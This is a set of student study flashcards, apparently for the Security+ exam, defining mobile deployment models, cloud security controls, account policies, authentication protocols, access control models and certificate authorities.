Tethering When a GPS-enabled smartphone can be attached to a laptop or mobile device device to provide internet access. If a user uses a laptop to connect to the company's network and then tethers to the internet, it may result in split tunneling. This presents a security risk if device is compromised. - Mobile devices can often function as a wifi hotspot over USB or Bluetooth.
Hotspot WiFi hotspots are internet access points that allow you to connect to a WiFi network using your computer, smartphone or another device while away from your home . Users connect here - Always use WPA2 - Use a good Security password / key
Payment Methods "Smartphones allow credit card details to be stored locally so that the phone can be used to make contactless payments using Near-Field Communications (NFC). For BYOD, it needs to be carefully monitored as someone could leave the company with a company credit card and continue to use it. MDM may prevent the payment function by disabling this tool in the mobile device management policies. - verify that the Smartphone is ""Secure"""
BYOD (Deployment Models) Bring Your Own Device -- where you bring your own device to work: this is where an employee is encouraged to bring in their own device so that they can use it for work.cost effective for the company and more convenient for the user. Company needs 2 policies to be effective, Acceptable Use Policy and On/Offboarding. Problems: - a disaster for IT -- b/c there's so many types of Mobile Devices and platforms and OS versions. - the end user owns the device and can put whatever they want on it. - You'll have to use MDM software or UEM to secure these type of devices being added to your Netork - however, end users feel like they don't want the company knowing their location and violating their privacy - Think -- you're allowing the company to store their personal Data (company data) on an end users cellphone
(COPE) deployment model Corporate-owned personally enabled (COPE) when the company purchases the device, such as a tablet, phone, or laptop, and allows the employee to use it for personal use. Often better solution for the company than BYOD from a management perspective, as IT can limit what applications run on the devices. Also frees the company to perform full device wipe if lost or stolen.
(CYOD) Choose your own device (CYOD) new employee chooses from a list of approved devices. Avoids problems of ownership because the company has a limited number of tablets, phones, and laptops, simplifying management compared to BYOD. When they leave the company and offboard, the devices are taken from them as they belong to the company(corporate-owned)
(AUP) for deployment of devices Acceptable Use Policy (AUP): An AUP outlines what the employee can do with the device during the working day.
Onboarding Policy of a device Device configuration requirements to access corporate data (min OS system, not rooted/jailbroken, etc.)
Offboarding Policy of a device How corporate data will be wiped from the device (most MDM platforms support a selective wipe, removing only company data). -MDM solutions with MAM (mobile app management) functionalitycan manage corporate data on BYOD devices
Virtual desktop infrastructure (VDI) Hosted desktop environments that provides great control and management automation/ When the security risk occurs, VDI can be simply isolated off the network for further investigation
High Availability Across Zones This is needed this are considered Unique physical locations within a region with independent power, network, and cooling. Comprised of two or more datacenters. Tolerant to datacenter Failures via Redundancy and Isolation
Resource policies policies that states and defines what access level a user has to a particular resource. ensuring the principle of least privilege is followed is crucial for resource security and audit compliance. - A CSP will provide details on how their cloud platform can help organizations meet a variety of compliance standards
Secrets management CSPs offer a cloud service for centralized secure storage and access for application secrets. This is usually a paid for feature (in AWS, costs at least $40) Basically it Stores Credentials in the Cloud so you don't have to keep typing it. A secret is anything that you want to control access to, such as API keys, passwords, certificates, tokens, or cryptographic keys. Service will typically offer programmatic access via API to support DevOps and continuous integration/continuous deployment (CI/CD) Access control at vault instance-level and to secrets stored within.
Integration and Auditing Integration is the process of how data is being handled from input to output. - Integrate security across Multiple Platforms (different OS and Apps) Auditing: - Validate the Security Controls - Verify Compliance with Financial and User Data - Create Reports that we're in compliance with Laws and Regulations. A cloud Auditor is responsible for ensuring that the policies, process, and security controls defined have been implemented. (Auditor will be a third party from outside the company) They test to verify that process and security controls and the system integration are working as expected. Some of these controls may include the following: -Encryption Levels -Access Control Lists -Privilege Account Use -Password Policies -Anti-Phishing Protection -Data Loss Prevention Controls
What is being provided when we want to use storage conatiners on Cloud on the storage containers you can set: Permissions : (who or what can access it) - A significant Concern for Cloud Storage: Customers have a storage identity and are put into different storage groups that have appropriate rights to restrictaccess at a tenant/subscription level. - One permission mistake can cause a Data Breach - Ex: Uber, Accenture, US Department of Defense Encryption With cloud storage, encryption at the service level is generally in place by default,with configurable encryption within the storage service. For relational databases (SQL), Transparent Data Encryption (TDE) is common.Encryption for data in transit, such as TLS/SSL. Replication: a method wherein Data is Copied from one location to another immediately to ensurerecovery in case of an outage. In the cloud, multiple copies of your data are always held for redundancy. -There are locally redundant, zone redundant, and geo-redundant options. - Disaster Recovery, High Availability (plan for Problems) High availability: High availability ensures that copies of your data are held in different locations. Automatic failover between region pair in event of an outage is common
Permissions : on Cloud Storage (who or what can access it) Customers have a storage identity and are put into different storage groups that have appropriate rights to restrict access at a tenant/subscription level.
Encryption (for Cloud Storage) With cloud storage, encryption at the service level is generally in place by default,with configurable encryption within the storage service. For relational databases (SQL), Transparent Data Encryption (TDE) is common. Encryption for data in transit, such as TLS/SSL.
Replication: a method where in data is copied from one location to another immediately to ensure recovery in case of an outage. In the cloud, multiple copies of your data are always held for redundancy. -There are locally redundant, zone redundant, and geo-redundant options.
High availability (on Cloud Storage) High availability ensures that copies of your data are held in different locations. - Automatic failover between region pair in event of an outage is common
Cloud Networks Use of cloud-based services to deploy a corporate network that connects an organization's employees, resources and applications. It involves hosting or using all or some of the network resources like: VDI, Switches, Routes, Bandwith, Virtual Firewalls or types cloud like Public, Hybrid or Private
Virtual Networks may consist of: Virtual Private Clouds (VPC's) : A virtual network that consists of Cloud Resources, where the VMs for one company are isolated from the resources of another company. Separate VPCs can be isolated using public and private networks. ----------------------------- ------------------------------ The Cloud Contains Virtual Devices: - You can create instances of Servers, Databases, Storage Devices & Systems. - The Cloud also allows you to build a Virtual Infrastructure such as: Virtual Switches, Virtual Routers from within the Network of the Cloud Console. - This follows the same configuration as configuring a physical device-- just within a cloud - The Network Changes with the Rest of the Infrastrucuture --(it's on Demand and has Rapid Elasticity such as Elastic IP's.)
Specifications of Public and Private Subnets Private Cloud: - contain All Internal IP addresses (not for public services -like websites), that connects to the Private Cloud over a VPN and have NO access from the Internet. A VPC my contain private subnets. Each of these subnets has its own CIDR IP address range and cannot connect directly to the internet. They could be configured go through the NAT gateway if outbound internet connectivity is desired Ex: The private subnet would use one of the following IP address ranges: 10.0.0.0, 172.16.x.x –172.31.x.x, or 192.168.0.0 . Public Cloud: - uses an External IP address so you connect to the cloud from anywhere. Hybrid Cloud: - Combine Internal Cloud resources with External. May combine BOTH Public and Private sunets.
Segmentation (Network) We use the Virtual Private and Public Cloud (VPC's) to create Segmentation of the Application and Data, so that they are isolated from each other Virtualized Security Technologies to use on VPC's. - WAF (Web Application Firewall) - Next Generation Firewall (NGFW) - Intrustion Prevention System (IPS)
API Inspection and Integration The Cloud contains multiple API's. We need to make sure that each one of them is integrated with the Cloud so it will work correctly. We also need to perform inspection of API's as hacker can pose as a legitimate user and send malicious request - For this reason it is Suggested you use API monitoring to View Specific API queries and calls to view ongoing communication.
Compute (Cloud Computing Security Controls) Security Groups: are basically Virtual Firewalls which determine who or what can access the resources (such as access to the VPC). Allows you to control Layer 3 or 4 - Dynamic resource allocation: Allocates resource as needed. Scalability and Elasticity are key in there Rapid Elasticity - automatically scaling resources up and down - pay for what you use Instance awareness Granular Security Controls - allows you to identify and manage very specific Data flows and each instance of it. Also allows you to Define and Set Policies VMs needs to be monitored to prevent VM Sprawl and unmanaged VMs Virtual Private Cloud Endpoint: This allows you to create a Private connection between your VPC and another cloud service without crossing over the internet. CSPs offer site-to-site connectivity options for hybrid cloud. - Allows Private access between the Application Instance and the Data. It also allows you to Restrict Data - Internet Connectivity is NOT required. Container security: offer a more granular option for application and process isolation. - Containers run in a VM (Virtual Machine) - Most CSPs offer hosted Kubernetes service, handles critical tasks like health monitoring and maintenance for you (Kubernetes has become the Standard) - Group container types on the Same Host (this Limits the scope of types of Intrusions.) ------------------ --------------- Compute Cloud Instances: A component that performs Calculations for the Cloud Environment (cloud computing:) Examples : Amazon Elastic Compute Cloud (EC2) Microsoft Azure Virtual Machines Google Compute Engine (GCE)
Security Groups: are basically Virtual Firewalls which determine who or what can access the resources (such as access to the VPC). Allows you to control Layer 3 or 4, CIDR Block notation IPV4 or IPV6 and create inbound rules for traffic on the network. - this allows us to Define Permissible Network Traffic.
Dynamic resource allocation: Allocates resource as needed. Provision resources when they are needed -- based on Demand. Can Provision Automatically: Scale up and Down aka Rapid Elasticity. This means you Pay for only what's used. The Cloud has Elasticity, which means it can expand and contract as needed.
Instance awareness Granular Security Controls for VM instances - allows you to identify and manage very specific Data flows and each instance of it. Also allows you to Define and Set Policies (Ex: Allows & Denies certain uploads to websites, denies spreadsheets or files containing credit card numbers). Also: VM instances need to be monitored to prevent VM sprawl and unmanaged VMs, which would have security consequences, but also add costs in the cloud.Tools like NIDS/NIPScan helpto detect new instances, and process controlslike privileged identity management, change and configuration management help
VPC Endpoint: Virtual Private Cloud Endpoint: This allows you to create a Private connection between your VPC and another cloud service without crossing over the internet. CSPs offer site-to-site connectivity options for hybrid cloud. - Allows Private access between the Application Instance and the Data. It also allows you to Restrict Data - Internet Connectivity is NOT required.
Container security: offer a more granular option for application and process isolation. - Containers run in a VM (Virtual Machine) - Most CSPs offer hosted Kubernetes service, handles critical tasks like health monitoring and maintenance for you (Kubernetes has become the Standard) - Group container types on the Same Host (this Limits the scope of types of Intrusions.)
Compute Cloud Instances: A component that performs Calculations for the Cloud Environment (cloud computing:) (not on the test) Examples : Amazon Elastic Compute Cloud (EC2) Microsoft Azure Virtual Machines Google Compute Engine (GCE)
CASB Cloud Access Security Broker (CASB) Software that sits in-between the Organization and the Cloud Service provider. It solely Enforces the company's Group Policies on to devices between On-premises and the Cloud. Can also Scan & detect (and optionally, prevent) data access with unauthorized apps and data storage in unauthorized location 2. An On-premises or cloud-based security policy enforcement point that is placed between cloud service consumers and cloud service providers to combine and interject enterprise security policies as cloud-based resources are accessed. Think of the CASB as the sheriff that enforces the laws set by the cloud service administrators
What can be used to ensure Application security Using solutions such as: 1. Web App Firewalls (WAF) 2. Next Gen Firewalls (NGFW) 3. IDP/IPS
(SWG) Next-generation Secure Web Gateway (SWG) Secure web gateways work at the Application level (layer 7), looking at the actual traffic over the protocol to detect malicious intent. Functions include Web proxy, Policy Enforcement, malware detection, traffic inspection, Data Loss Protection, and URL filtering.
Firewall considerations in a cloud environment One reason that we need a good firewall is to filter incoming traffic flow to protect our cloud-hosted infrastructure and Applications from hackers or malware. For example, the most common cloud firewall is the Web Application Firewall (WAF) Cost one of the reasons for WAF (Web Application Firewall) and Virtual Firewall popularity is that It meets a common need, is easy to configure, and is less expensive than more function-rich NGFW and SWG options. Need for segmentation The firewall can filter traffic between virtual networks and the Internet, Microservices, VMs, and VPCs. Network segmentation should be supported with appropriate traffic filtering/restriction with the firewall type that is most appropriate for the use case. Open Systems Interconnection (OSI) layers A network firewall works on Layer 3 (Network), stateful packet inspection at layers 3/4 (Network / Transport layer) . Many cloud firewalls,like Web Application Firewalls work at Layer 7 (Application Level) of the OSI
Cost (Firewall Considerations in Cloud Environments) one of the reasons for WAF (Web Application Firewall) and Virtual Firewall popularity is that It meets a common need, is easy to configure, and is less expensive than more function-rich NGFW and SWG options.
Need for segmentation (Firewall considerations in a cloud environment) The firewall can filter traffic between virtual networks and the Internet, Microservices, VMs, and VPCs. Network segmentation should be supported with appropriate traffic filtering/restriction with the firewall type that is most appropriate for the use case.
Open Systems Interconnection (OSI) layers (-Firewall considerations in a cloud environment) A network firewall runs on Layer 3 (Network) Stateful packet inspection happens at Layers 3 & 4 (Network / Transport layer) respectively. Many cloud firewalls,like Web Application Firewalls work at Layer 7 (Application Level) of the OSI
OSI review mneumonic (from bottom to Top of OSI model): People Don't Need To See Polly Anna. ------------ ------------
Cloud Native Controls vs 3rd Party Solutions Cloud Native Security Controls Platforms like Microsoft Azure and Amazon Web Services (AWS) have their own tools, such as Azure Resource Manager (ARM) and AWS Cloud Formation. These tools make managing Microsoft and AWS cloud resources easier, supporting Infrastructure-as-Code -Separate tools, for separate platforms, separate skillsets Pros: Integrated and Supported by the CSP, Highly Configurables, Security is part of the Infrastructure, ususally no additional costs. Third Party Solutions: 3rd -party tools adds more flexibility, functionality, and multi-platform support.Organizations will typically move to third-party solutions when the native cloud solutions do not meet their functionality needs. Example, some organizations move to Terraform for infrastructure-as-Code because it supports the major CSPs using a single language - CSPs offer a marketplace where third-parties can publish offers - Pros: Support across multiple cloud providers, Extends Policies outside of the Scope of the CSP, more extensive reportins.
Cloud Native Security Controls Platforms like Microsoft Azure and Amazon Web Services (AWS) have their own tools, such as Azure Resource Manager (ARM) and AWS Cloud Formation. These tools make managing Microsoft and AWS cloud resources easier, supporting Infrastructure-as-Code -Separate tools, for separate platforms, separate skillsets Pros: Integrated and Supported by the CSP, Highly Configurables, Security is part of the Infrastructure, ususally no additional costs.
Third Party Solutions(cloud): 3rd -party Tools ADD more flexibility, Functionality, and multi-platform support. Organizations will typically move to third-party solutions when the native cloud solutions do not meet their functionality needs. Example: some organizations move to TERRAFORM for Infrastructure-as-Code (IaC) because it supports the major CSPs using a single language - CSPs offer a marketplace where 3rd-parties can publish offers - Pros: Support across multiple cloud providers, Extends Policies outside of the Scope of the CSP, more extensive reportings
idP Identity provider (IdP) Creates, maintains, and manages identity information while providing authentication services to applications. IdP are basically places, Websites, or software that can store your identity. Ex: when you use SSO (Single Sign On), you need a place to store your un/pw ID. This is what OpenID or Kerberos does. Examples: Azure Active Directory is the identity provider for Office365 Other examples include Active Directory, OKTA, and DUO
Attributes (of Identity) a unique property in a user’s account DETAILS, such as employee ID, fingerprint, birthday, SSN, gender, thumbprint etc
Certificates (for Identity) a digital certificate where two keys are generated, a public key and a private key. The private key is used for identity. Ex: Amazon's Website - when you go to their Website, Amazons Certificate is viewable from the Browser verifying their identification.
Tokens (for Identification) a digital token, such as a SAML token used for Federation Services, or a token used by Open Authorization (OAuth2). Other Examples: RSA Tokens
SSH Keys (For Identification) Typically used by an Administrator for Secure Authentication to a remote Linux server, instead of using username and password. The public key is stored on the server, with the private key remaining on the administrator's desktop.
Smart Cards (for Identification) a credit card-like token with a certificate embedded on a chip; it is used in conjunction with a pin - physical card
User Account (Account Types) a standard user account with Limited Privileges. - cannot install software, limited access to the computer systems. 2 types of user accounts: those that are LOCAL to the machine, and those that ACCESS a Domain.
Shared and generic accounts/credentials When a group of people performs the same duties, such as members of customer services, they can use a shared account. When user-level monitoring, auditing, or non-repudiation are required, you must eliminate the use of shared accounts. - Most cloud IDPs have options to eliminate the need for shared accounts
Service accounts "aka ""Principal Account"" - a Service Account is a type of Administrator Account used to run an application. - Access can be defined for a specific service - Used Exclusively by Services Running on a Computer. Ex: Account to run an anti-virus application. when software is installed on a computer or server, it may require PRIVILIDGED Access to run. a Lower-Level Administrative Account, and the Service Account fits the bill."
Guest accounts "Access to a Computer for Guests - No access to change settings, modify applications, view other users files, etc - usually has no password Defined: a legacy account that was designed to give Limited Access to a single computer without the need to create a user account. Normally Disabled as it is no longer used, and some administrators see it as a security risk. Window 10 build 10159 REMOVED this feature of ""Guest Account"" b/c it presented many security risks."
Password complexity (Account Policies) Complex passwords (sometimes known as strong passwords) are formatted by choosing at least three of the following four groups: lowercase(a, b, and c), uppercase (A, B, and C), numbers(1, 2, and 3), special characters ($, @) - Password complexity should be enabled so that users don't have weak passwords - make your password strong (prevents Brute-Force attacks) - Increase Password Entropy - No single words, no obvious passwords - Mix upper and lower case and use special characters. -prevent password reuse
Password History prevents the end user from Reusing the Same password. For example, if the number remembered is 12 passwords, only on 13th change could it be reused.
Password Reuse a term used in the exam that means the same as password history. both prevent someone from reusing the same password. Account policies For the Security+ exam, Password Reuse and history are the same thing.
Network Locations as a security measure - Location Based Policy - Identify devices based on IP subnets or IP addresses - Can be difficult to enforce with mobile devices May include these subset under Network Locations: Geofencing Geotagging Geolocation
Geofencing (Account Policies) can be used to establish a region and can pinpoint whether you are in that region. If you are not, you will not be able to log in. - mostly on Mobile Devices - part of Location-Based Authentication: can be added as an additional factor in authentication
Geolocation (Account Policies) can track and end users location by your IP address and the ISP. - can use GPS mobile devices are very accurate with location tracking - may use 802.11 Wireless Network which someone is connected to, which is less accurate - may use IP address of which the end user is connected from (this is not very accurate for tracking)
Geotagging the process of adding geographical identification metadata to various media such as a geotagged photograph or video, websites, SMS messages, QR Codes or RSS feeds and is a form of geospatial metadata. This data usually consists of latitude and longitude coordinates, though they can also include altitude, bearing, distance, accuracy data, and place names, and perhaps a time stamp. The geographical location data used in geotagging can, in almost every case, be derived from the global positioning system, and based on a latitude/longitude-coordinate system that presents each location on the earth - adds Location information / Metadata to a document or File the end user is storing. - Latitude and Longitude, Distance, Time Stamps - Location-Based Policy -- these can all be combined.
Time-Based logins establishes a time range for when end users can access a companies network. It can be used to prevent accessing the network e.g. after the user's shift. It ensures that the user use the resources only during working hours
Access Policies policies as to what resources employees can access. - control access to the account
Account permissions what permissions that account has rights to. - also Granting Permissions Ex: giving permission to a folder
Account Audits an auditor will review accounts periodically to ensure that old accounts are not being used after an employee changes departments or leaves the company. Auditor will also ensure that All employees have the only necessary permissions and privileges to carry out their jobs. - Principle of Least Priviledge
Risky login / Impossible travel time Risky login A security feature used by Cloud Providers, leveraging a record of devices used by each user. Response will vary by provider but may include confirmation email to validate identity or responding to a prompt in an authenticator app. - How user and sign-in risk are used varies by provider Impossible travel time: This is a security feature used by cloud providers such as Microsoft with their Office 365 package to prevent fraud. If a person is in Houston and then 15 minutes later is determined to be New York, their attempt to log in will be blocked.
Risky login A security feature used by Cloud Providers, leveraging a record of devices used by each user. Response will vary by provider but may include confirmation email to validate identity or responding to a prompt in an authenticator app. - How user and sign-in risk are used varies by provider
Impossible travel time: This is a security feature used by cloud providers such as Microsoft with their Office 365 package to prevent fraud. If a person is in Houston and then 15 minutes later is determined to be New York, their attempt to log in will be blocked.
Lockout Account Lockout Policy in AD-- this can be setup to: - Lockout end user for a certain period of time - Disables the account until someone else (Admin) comes along and enables it for the end user
Disablement Account management (the identity lifecycle) ranges from: Account creation at Onboarding to its DISABLEMENT when a user leaves the company.
Password Keys a physical hardware device, that looks like a USB device (and plugs into USB) and works in conjunction with your password to provide multi-factor authentication (MFA) - Helps Prevent Unauthorized Logins and Account Takeovers (This password Key must be present to login) - Doesn't replace other Authentication Factors (passwords are still important) - Example: YubiKey is a FIPS 140-2 validation that provides code storage within a tamper-proof container
Password Vaults "A Password Manager that allows you to store your passwords in 1 central area. The Password Manager Encrypts All Credentials stored. Also has the option for Cloud-Based Synchronization options. passwords are stored locally on the device. - Stores passwords so user does not need to remember them. - Uses strong encryption (e.g.AES-256) for secure storage. - This is only as secure as the owner password that is used to protect the vault itself Ex: iCloud ""Keychain"" on Macbooks (free), LastPass, 1Password, Dashlane, NordPass, Bitwarden, Keeper, RoboForm, etc"
TPM Trusted Platform Modules (TPM) a computer chip (microcontroller) normally built into the motherboard of a computer, that is used when you are using Full Disk Encryption (FDE). - Designed to Secure hardware with integrated Cryptographic keys - also considered Cryptographic Processor - Persistent Memory (comes with unique keys burned in during production) - Versatile Memory - has storage keys, hardware configuration information etc. - Password Protected (no dictionary attacks)
HSM Hardware Security Module (HSM) hardware that uses high end Cryptography. used to Store Encryption Keys, a key escrow that holds the private keys for third parties - usually a server that contains specialized hardware that allows quick cryptography. - can be used for Centralized storage for all Cryptographic keys - needs redundancy -- (such as multiple HSMs)
Knowledge-based Authentication "used During the authentication process, the end user is asked very specific knowledge questions that only they know. This is normally used by banks, financial institutions, or email providers to identify someone when they want a password reset. There are two different types of KBA, 1. Dynamic 2. Static and they have their strengths and weaknesses: Static KBA: These are questions that are common to the user. For example, ""What is the name of your first school?"" Dynamic KBA: These are deemed to be more secure because they do not consist of questions provided beforehand. For example: 1. What was the ""street number"" when you lived in Florida? (gives you a limited time to answer) 2. to confirm identity, a bank may ask the customer to name 3 direct debit mandates, the date, and the amount paid"
EAP Extensible Authentication Protocol (EAP) is an Authentication framework frequently used in network and internet connections. - allows for New Authentication technologies to be compatible with existing wireless or point-to-point connection technologies - provides the transport and usage of material and parameters generated by EAP methods
CHAP "Challenge-Handshake Authentication Protocol (CHAP) is an Authentication Protocol to validate users by sending an Encrypted Challenge over the network. - Consists of a 3 way handshake - After a link is established: the Server sends the Client a ""Challenge Message"" - The Client responds with the password Hash - Server compares Received Hash with the Stored Hash to confirm. (It finishes) - This ""Challenge Response"" is ongoing, the process continues periodically while the session is active (while on the webpage). The end user never sees that this is happening. other definition: an identity checking protocol that Periodically Re-authenticates the user during an online session. Properly implemented CHAP is Replay Attack resistant, and far more secure than the Password Authentication Protocol (PAP)."
PAP Password Authentication Protocol (PAP) a password-based authentication protocol used by Point-to-Point Protocol (PPP) to validate users. supported by almost all network OS remote access servers but is considered weak.
802.1X A network authentication protocol that opens ports for network access when an organization authenticates a user's identity and authorizes them for access to the network an Authentication mechanism to devices wishing to attach to a LAN or WLAN. Defines the encapsulationof EAP protocol. - Involves 3 parties: a Supplicant, an Authenticator, and an Authentication server (Supplicant = Client)
RADIUS Remote Authentication Dial-In User Service (RADIUS) a Networking Protocol that provides Centralized Authentication, Authorization, and Accounting (AAA protocol) management for users who connect and use a network service. - RADIUS is a Client / Server Protocol that Runs in the Application Layer, and can use TCP or UDP and encrypts the password only. - RADIUS supports a wide variety of platforms and devices - Not just for Dial in anymore... - Centralizes Authentications for users (Routers, Switches, Firewalls, Server Authentication, Remote VPN access) - 802.1X Network Access - Available on ANY Server Operating System.
TACACS + Terminal Access Controller Access-Control System Plus (TACACS+) an Alternative to RADIUS. Developed by CISCO Definition: a family of related Protocols handling remote AUTHENTICATION and related services for NETWORK ACCESS CONTROL through a Centralized Server. versions of TACACS include: uses PORT: 49 -- TCP - The Latest version is TACACS+, however it is NOT BACKWARDS compatiible with previous versions of TACACS. This version is considered a Separate Protocol.
Kerberos (Review) a Network Authentication protocol that works on the basis of cryptographic tickets to allow nodes communicating over a non-secure network, to prove their identity to one another in a secure manner. (Both the user and the server verify each other's identity). - Authenticates once, trusted by the System - No need to re-authenticate to everything -- reauthenticates throughout the day automatically. - Provides Mutual Authentication - meaning the client is not only authenticating to the server, but the Server also has to authenticate to us. - Protects against On-Path or Replay attacks - Developed by MIT since the 1980's - Integrated in Microsoft Windows 2000 - Based on Kerberos 5.0 open standard -- compatible with other operating systems. - is the Authorization protocol in Microsoft’s Azure Directory (and is preferred is to NTLM). - runs as a third-party trusted server known as the Key Distribution Center (KDC) -Includes an authentication server, a ticket granting service, and database of secret keys for users and services. ======= 2. An authentication protocol used by Windows to provide for two-way (mutual) authentication using a system of tickets uses Port: 88
SSO "Single sign-on (SSO) is an authentication method that enables users to securely Authenticate with multiple applications and websites by using just one set of credentials. Single Sign-On means a user doesn't have to sign into every application they use. The user logs in once and that credential is used for multiple apps. Single sign-on based authentication systems are often called ""modern authentication"""
SAML Security Assertion Markup Language (SAML) is an XML-based, open-standard data format for Exchanging Authentication and Authorization data between parties, in particular, between an Identity Provider and a Service Provider. SAML is also: A set of XML-based protocol messages A set of protocol message bindings A set of profiles (utilizing all of the above) An important case that SAML addresses is web-browser single sign-on (SSO). Single sign-on is relatively easy to accomplish within a security domain (using cookies, for example) but extending SSO across security domains is more difficult and resulted in the proliferation of non-interoperable proprietary technologies. The SAML Web Browser SSO profile was specified and standardized to promote interoperability
OAuth "short for ( ""Open Authorization"") is an Open standard Authorization Framework that determines what resources a user will be able to access. Used / Paired with OpenID Commonly used as a way for Internet users to log into 3rd party websites using their Microsoft, Google, Facebook, Twitter, One Network etc. accounts without giving them their password. This Authorization Framework was developed by Google, Twitter, Facebook, LinkedIn, etc."
OpenID is an Open Standard and Decentralized Authentication Protocol (created by the non-profit OpenID Foundation) Allows Users to be Authenticated by Co-Operating Websites maintained by a 3RD party identity provider (IDP) service referred to as an OpenID provider (Ex: Facebook, Twitter, Google etc) and to log into multiple Unrelated Websites with ONE SET of CREDENTIALS Example: logging into Spotify with your FB account
What is Role-Based Access Control? Role Based Access Control (RBAC) A key characteristic is the use of Roles or Groups. Instead of assigning permissions directly to users, user accounts are placed in Roles / Groups and administrators assign privileges to the roles. - Typically mapped to job roles - good for high turnover environment
ABAC Attribute-Based Access Control (ABAC) Access is Restricted Based on an Attribute on the Account, such as Department, Location, Login, Browser, when they login or functional designation - For example, admin may require user accounts have the‘Legal’ department attribute to view contracts
Define Rule-Based Access Control Rule-based Access Control (RBAC) A key characteristic is that it applies Global Rules that apply to All Subjects. 2. Access is granted based on RULES or Conditions set by the System Administrator. These rules can include conditions such as: Time of day, Location, and Network Connection Rules within this model are sometimes referred to as Restrictions or Filters. basically you're using an Acess Control List (ACL) to grant access -- This is done on Firewalls and Routers via the ACL feature. -Example: a Firewall uses Rules that Allow or Block Traffic to All users equally
MAC Predefined set of strict rules/labels that restrict an access to specific resources. They are being controlled directly by Administrators or a system,, restricting the individual ability of Resource Owners of granting/denying access to the resource. Key characteristics include: - Centralized Management - Strict Enforcement - Need-to-know basisH - Data Confidentiality
DAC Discretionary Access Control (DAC) a type of Security access control that grants or restricts object access via an Access Policy determined by an object's owner group and/or subjects. A key characteristic of the Discretionary Access Control (DAC) model is that every object has an owner, and the owner can grant or deny access to any other subject (Use-based, user-centric) 2) leaves a certain amount of Access Control to the Discretion of the Object's owner or anyone else who is authorized to control the Objects Access. The Owner can determine who should have Access Rights to an Object and what they should be. - Also Governs the Ability of Subjects to Access Objects, but it allows users the ability to make policy decisions and/or assign security attributes DAC is the opposite of MAC in the sense that the USER has the ability to make policy decisions and assign security. Ex: NTFS (New Technology File Systems)
PAM Privileged Access Management (PAM) aka PIM, or Privilege Management. Is a comprehensive cybersecurity strategy for exerting control over the elevated (“privileged”) access and permissions for users, accounts, processes, and systems across an IT environment. PAM exists to protect against the threats posed by credential theft and privilege misuse. Also -- to control, monitor, secure and audit all human and non-human privileged identities and activities across an enterprise IT environment. Alternatively referred to as privileged identity management (PIM) or privileged access security (PAS), just privilege management, PAM is grounded in the principle of least privilege, wherein users only receive the minimum levels of access required to perform their job functions Other Definitions: a solution that helps protect the privileged accounts within a Domain, preventing attacks such as pass the hash and privilege escalation. - Native to some cloud identity providers today, and may include a just-in-time elevation feature - managing Superuser access (Administrator and Root) - Stores Privileged Accounts in a Digital Vault. Access is Only Granted from the Vault by Request These privileges are Temporary PAM Advantages - Centralized password management - Enables Automation - Manage Access for each user - Extensive Tracking and Auditing
Conditional Access "a function that lets you manage people’s access to Software, Apps, Files, Documents, etc by setting ""conditions"". Possible Conditions may be: Must be Employee or partner, Type of application accessed, Geographical location IP address and network MFA Used device Browser Operating System (OS) When setting up conditional access, access can be limited to or prevented from the chosen conditions. This way it can be determined that, for example, access is only possible from certain networks or prevented from certain browsers. - Controls: Allow or block, require MFA, provide limited access , require password reset - Administrators can build complex access rules for complete control over Data Access. Located under: Azure Portal > Microsoft Entra > Protection > Conditional Access"
Filesystem Permissions - relates to the Stored Files and the Access to them (Hard drive, SSDs, Flashdrives, DVDs) - The Filesystem permissions are part of most OS. Most File Systems include Attributes of files and directories that control the ability of users to read, change, navigate, and execute the contents of the file system. In some cases, menu options or functions may be made visible or hidden depending on a user's permission level; this kind of user interface is referred to as permission-driven. FileSystem Permissions are applied to every File and Folder stored on a volume with NTFS file system
Key Management the Management of Cryptographic Keys in a crypto-system / PKI. This includes dealing with the Key Generation(aka key creation), Exchange, Storage, Distribution, Use, Revocation, Expiration, and crypto-shredding (destruction) and replacement of keys Key Generation - creating a key with the requested strength using the proper Cipher ---- ---- Key management is the basis of all Data Security. Why? b/c Data is encrypted and decrypted via the use of encryption keys, which means the loss or compromise of any encryption key would invalidate the data security measures put into place. Keys also ensure the safe transmission of data across an Internet connection.
Certificate Authority (CA) "- The Entity that issues Certificates to a user. It issues, manages, Validates and can Revoke Certificates. (Considered the Ultimate Authority as it holds the Master Key aka the ""Root Key"", for signing all certificates that it than hands off to the Intermediary CA.) Certification Authorities are responsible for creating Digital Certificates and own the policies, practices, and procedures for vetting recipients (to verify they are safe) and issuing the certificates. Specifically, the owners and operators of a CA determine: Vetting methods for certificate recipients Types of certificates issued Parameters contained within the certificate Security and operations procedures A Certificate Authority (CA) can issue multiple certificates in the form of a tree structure. ---- ---- Other Definition: an entity that stores, signs, and issues digital certificates. The certificate issued provides the Ability to Establish a Secure Session. A CA acts as a Trusted 3rd party—trusted both by the subject (owner) of the certificate and by the party relying upon the certificate Ex: Verisign, Digisign, and many others act as Root CA. Comodo & Symantec are examples of Public CA's. Public CA's make money by selling certificate. The CA must be Trusted for this to work."
Intermediate CA "Intermediate Certificate Authorities (CAs), aka Subordinate CAs are Certificate Authorities (CA) that issue off a Certificate to an Intermediate Root. Intermediate Certificates are used as a stand-in for our Root certificate. How the Certificate Chain works: Root CA issues Certificates to Intermediate CA. Intermediate issues ticket to Sub CA's. Subordinate CA's issue certificate to the Devices and End users. In smaller organizations, a Root CA may be able to just issue certificates directly to the device or end user, so the other branches may not be needed. The can be used as a proxy because we must keep our root certificate behind numerous layers of security, ensuring its keys are absolutely inaccessible. However, because the root certificate itself signed the intermediate certificate, the intermediate certificate can be used to sign the SSLs our customers install and maintain the ""Chain of Trust. They do not have ""Roots"" in the browser’s Trust Stores, instead their Intermediate roots chain back to a Trusted 3rd-party root. This is sometimes called cross-signing."
Priviledged Access In an enterprise environment, “Privileged access” is a term used to designate special access or abilities above and beyond that of a standard user. Privileged access allows organizations to secure their infrastructure and applications, run business efficiently and maintain the confidentiality of sensitive data and critical infrastructure. Privileged access can be associated with human users as well as non-human users such as applications and machine identities.
Root Program (aka Root Certificate) a root certificate, aka a 'Trusted Root' is a special kind of X.509 digital certificate that can be used to issue other certificates. Root Certificates are at the center of the trust model that undergirds Public Key Infrastructure (PKI), and by extension SSL/TLS. A root certificate is invaluable, because any certificate signed with its private key will be automatically trusted by the browsers. Ergo, you really need to make sure you can trust the Certificate Authority (CA) issuing from it. In this sense it might be helpful to view trust in two specific contexts: 1. Social Trust 2. Technical Trust --------------- ---------------- Every device includes something called a Root store. A root store is a collection of pre-downloaded root certificates (and their public keys) that live on the device itself. Generally, the device will use whatever root store is native to its OS, otherwise it might use a third-party root store via an app like a web browser. There are several major root programs of note: Microsoft Apple Google Mozilla
